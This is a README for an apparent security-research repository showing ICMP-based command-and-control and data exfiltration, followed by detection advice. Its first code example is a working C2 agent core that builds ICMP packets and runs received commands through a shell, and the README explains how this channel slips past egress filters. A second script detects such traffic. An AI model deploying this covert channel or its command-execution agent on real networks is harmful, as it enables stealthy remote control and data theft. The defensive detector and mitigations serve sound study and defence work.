This project demonstrates two key attack techniques using ICMP (ping) packets:
- ICMP Reverse Shell-like Command & Control (C2)
- ICMP Data Exfiltration (One-Way)
```
.
├── c2server.py # Attacker C2 server (multi-command ICMP Echo Reply)
├── password.txt # Sample data to exfiltrate
├── Readme.md # This documentation
├── recieve.py # Attacker ICMP sniffer for one-way exfil
├── send.py # Victim script for one-way exfil (password.txt over ICMP)
└── victim_icmp_malware.py # Victim agent for full C2 with interactive command execution
```
| Component | Function |
|---|---|
| `send.py` | Exfiltrates the contents of `password.txt` to the attacker via ICMP Echo Requests |
| `recieve.py` | Listens for and extracts ICMP payloads (one-way exfil capture) |
| `c2server.py` | Sends predefined commands in ICMP Echo Replies (multi-command C2) |
| `victim_icmp_malware.py` | Fully interactive agent: sends a beacon, receives a command, executes it, replies with the output |
IMPORTANT: on the C2 server, run `sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1` before starting `c2server.py`.
With this set, the kernel ignores incoming Echo Requests instead of answering them, so the script can sniff the victim's requests and send its own Echo Reply carrying the command. Without it the victim receives a plain kernel-generated reply (echoing its own beacon) in addition to the scripted one. The setting also stops the server from answering ordinary pings, so restore it with `sudo sysctl -w net.ipv4.icmp_echo_ignore_all=0` when you are done.
One-way exfiltration:
- On the attacker: `python3 recieve.py`
- On the victim: `python3 send.py`
✅ Result: the content of `password.txt` is printed on the attacker side.

Two-way C2:
- On the attacker: `python3 c2server.py` sends commands such as `whoami` and `ls -al` in Echo Replies.
- On the victim: `python3 victim_icmp_malware.py` sends periodic beacons, receives and executes the commands, and sends their output back via ICMP.

All four scripts craft or sniff raw ICMP packets, so they must run as root (or with CAP_NET_RAW) on both sides.
- The victim sends ICMP Echo Requests whose payload carries a beacon or exfiltrated data.
- The attacker answers with ICMP Echo Replies whose payload carries a command, reusing the request's identifier and sequence number so the exchange looks like an ordinary ping.
- The victim executes the command and sends the output in its next Echo Request.
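The exchange above, worked through in memory as an added example (this is not the repository's code and uses a hypothetical one-byte payload framing of `B` beacon / `C` command / `R` result; the real scripts may frame their payloads differently). It builds and parses ICMP Echo messages with a real RFC 1071 checksum, shows the attacker reusing the request's identifier and sequence number in its reply, and shows why the agent must ignore a kernel-generated reply that merely echoes the beacon back:

```python
import struct
import subprocess

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0

# Hypothetical one-byte framing for the payload (assumed for this example,
# not the repository's format): 'B' beacon, 'C' command, 'R' command result.
TAG_BEACON, TAG_CMD, TAG_RESULT = b"B", b"C", b"R"


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over ICMP header + payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Serialise an ICMP Echo message (type, code=0, checksum, ident, seq) + payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(packet: bytes):
    """Return (type, code, ident, seq, payload); reject truncated or corrupt packets."""
    if len(packet) < 8:
        raise ValueError("truncated ICMP packet")
    if icmp_checksum(packet) != 0:  # a packet with a valid checksum sums to zero
        raise ValueError("bad ICMP checksum")
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return icmp_type, code, ident, seq, packet[8:]


def victim_beacon(session: int, seq: int, hostname: bytes = b"host1") -> bytes:
    """Step 1: the agent checks in with an Echo Request whose payload is a beacon."""
    return build_icmp(ICMP_ECHO_REQUEST, session, seq, TAG_BEACON + hostname)


def attacker_reply(request: bytes, command: str) -> bytes:
    """Step 2: the C2 answers with an Echo Reply carrying the command.
    It reuses the request's ident/seq exactly as a genuine ping reply would."""
    icmp_type, _code, ident, seq, payload = parse_icmp(request)
    if icmp_type != ICMP_ECHO_REQUEST or payload[:1] not in (TAG_BEACON, TAG_RESULT):
        raise ValueError("not a beacon or result from the agent")
    return build_icmp(ICMP_ECHO_REPLY, ident, seq, TAG_CMD + command.encode())


def victim_handle_reply(reply: bytes, session: int, expected_seq: int, run):
    """Step 3: the agent validates the reply, executes the command through `run`
    and returns the next Echo Request carrying the output (None if not for us)."""
    icmp_type, _code, ident, seq, payload = parse_icmp(reply)
    if icmp_type != ICMP_ECHO_REPLY or ident != session or seq != expected_seq:
        return None  # a reply to somebody else's ping, or a replayed one
    if payload[:1] != TAG_CMD:
        return None  # a kernel ping reply that just echoed our own beacon back
    output = run(payload[1:].decode())
    return build_icmp(ICMP_ECHO_REQUEST, session, seq + 1, TAG_RESULT + output)


def run_shell(command: str) -> bytes:
    """What a real agent does: execute the command and capture its output."""
    proc = subprocess.run(command, shell=True, capture_output=True)
    return proc.stdout + proc.stderr


def simulate_exchange(run, session: int = 0x1337, command: str = "whoami"):
    """One full beacon -> command -> result round trip, with no packets on the wire."""
    beacon = victim_beacon(session, 1)
    reply = attacker_reply(beacon, command)
    result = victim_handle_reply(reply, session, 1, run)
    return parse_icmp(result)  # (type, code, ident, seq, payload)


if __name__ == "__main__":
    print(simulate_exchange(run_shell))
```

The `TAG_CMD` check in `victim_handle_reply` is the in-code counterpart of the `icmp_echo_ignore_all` sysctl: if the kernel on the C2 host is still answering pings, the agent receives two replies with the same ident/seq, and only the scripted one carries a command. On the wire the real scripts would hand these byte strings to a raw socket (`socket.SOCK_RAW`, `IPPROTO_ICMP`), which is why both sides need root.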
✅ Outbound ICMP Echo Requests are often allowed by egress filters, because ping is relied on for troubleshooting.
✅ Inbound Echo Replies are often not blocked, because stateful firewalls treat them as the answer to an outbound request.
✅ No TCP/UDP port is needed, so port-based egress rules and proxies never see the channel.
- Limit or block outbound ICMP from workstations; where ping must stay enabled, rate-limit it and restrict it to known destinations.
- Monitor for ICMP Echo packets with non-standard payloads: data sizes other than the OS defaults (56 bytes on Linux, 32 on Windows), payloads that are not the stock ping filler, and Echo Replies whose payload does not mirror the matching request.
- Use a NIDS (e.g., Suricata, Zeek) with ICMP inspection enabled; Suricata's `itype`/`dsize` rule keywords and Zeek's `icmp_echo_request`/`icmp_echo_reply` events expose the type, size and payload needed for the checks above.
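The payload checks from the defensive list, as an added example that is not part of this repository: a small detector run over constructed sample records of the kind a sniffer or a Zeek `icmp_echo_request`/`icmp_echo_reply` handler would produce (source, destination, ICMP type, identifier, sequence, payload). It recognises the stock Linux iputils and Windows ping payloads, flags Echo Requests carrying anything else, and flags Echo Replies that do not mirror their request, which is exactly what a command-in-reply C2 like this one produces. The sample traffic and the `Bhost1`/`Cwhoami` framing are constructed for the example, not taken from a capture:

```python
from typing import Dict, List, Tuple

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0

# Stock Echo payload of the Windows ping utility (32 bytes).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def looks_like_linux_ping(payload: bytes) -> bool:
    """iputils ping: a timestamp in the first 8 or 16 bytes, then filler in
    which byte i has the value i (0x10 0x11 ... 0x37 for the default 56 bytes)."""
    if len(payload) < 16:
        return False
    return payload[16:] == bytes(i & 0xFF for i in range(16, len(payload)))


def looks_like_windows_ping(payload: bytes) -> bool:
    return payload == WINDOWS_PING_PAYLOAD


# One record per ICMP Echo packet: (src, dst, icmp_type, ident, seq, payload)
Record = Tuple[str, str, int, int, int, bytes]


def analyze(records: List[Record]) -> List[str]:
    """Return one alert string per suspicious packet:
    - Echo Request whose payload is not a stock ping payload
    - Echo Reply with no matching outstanding request
    - Echo Reply whose payload does not mirror the request it answers"""
    alerts: List[str] = []
    # Outstanding requests keyed by (expected replier, pinger, ident, seq).
    pending: Dict[Tuple[str, str, int, int], bytes] = {}
    for src, dst, icmp_type, ident, seq, payload in records:
        where = f"{src}->{dst} id={ident:#x} seq={seq}"
        if icmp_type == ICMP_ECHO_REQUEST:
            if not (looks_like_linux_ping(payload) or looks_like_windows_ping(payload)):
                alerts.append(f"{where}: echo request with non-standard payload ({len(payload)} bytes)")
            pending[(dst, src, ident, seq)] = payload
        elif icmp_type == ICMP_ECHO_REPLY:
            request_payload = pending.pop((src, dst, ident, seq), None)
            if request_payload is None:
                alerts.append(f"{where}: echo reply with no matching request")
            elif payload != request_payload:
                alerts.append(f"{where}: echo reply payload does not mirror the request")
    return alerts


# Default 56-byte Linux payload with the timestamp zeroed (values irrelevant to the check).
LINUX_PING = bytes(16) + bytes(range(16, 56))

# Constructed sample traffic (not a real capture): two benign ping pairs,
# then a beacon / command / result sequence like the one this project produces.
SAMPLE_RECORDS: List[Record] = [
    ("10.0.0.5", "8.8.8.8", ICMP_ECHO_REQUEST, 0x1234, 1, LINUX_PING),
    ("8.8.8.8", "10.0.0.5", ICMP_ECHO_REPLY, 0x1234, 1, LINUX_PING),
    ("10.0.0.7", "10.0.0.1", ICMP_ECHO_REQUEST, 0x0001, 5, WINDOWS_PING_PAYLOAD),
    ("10.0.0.1", "10.0.0.7", ICMP_ECHO_REPLY, 0x0001, 5, WINDOWS_PING_PAYLOAD),
    ("10.0.0.5", "203.0.113.9", ICMP_ECHO_REQUEST, 0x1337, 1, b"Bhost1"),
    ("203.0.113.9", "10.0.0.5", ICMP_ECHO_REPLY, 0x1337, 1, b"Cwhoami"),
    ("10.0.0.5", "203.0.113.9", ICMP_ECHO_REQUEST, 0x1337, 2, b"Rroot\n"),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_RECORDS):
        print(alert)
```

The reply-mirroring check is the one worth deploying first: an attacker can pad beacons to 56 bytes and copy the iputils filler to defeat the payload-pattern test, but a reply that carries a command cannot also be a byte-for-byte copy of the request. In a NIDS the size test alone maps onto a rule keyed on `itype:8` with a `dsize` condition, while the mirroring test needs request/reply state such as the Zeek events mentioned above.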
This repository is for educational and authorized research purposes only.
Do not use it on systems or networks without explicit permission.
Misuse may be illegal.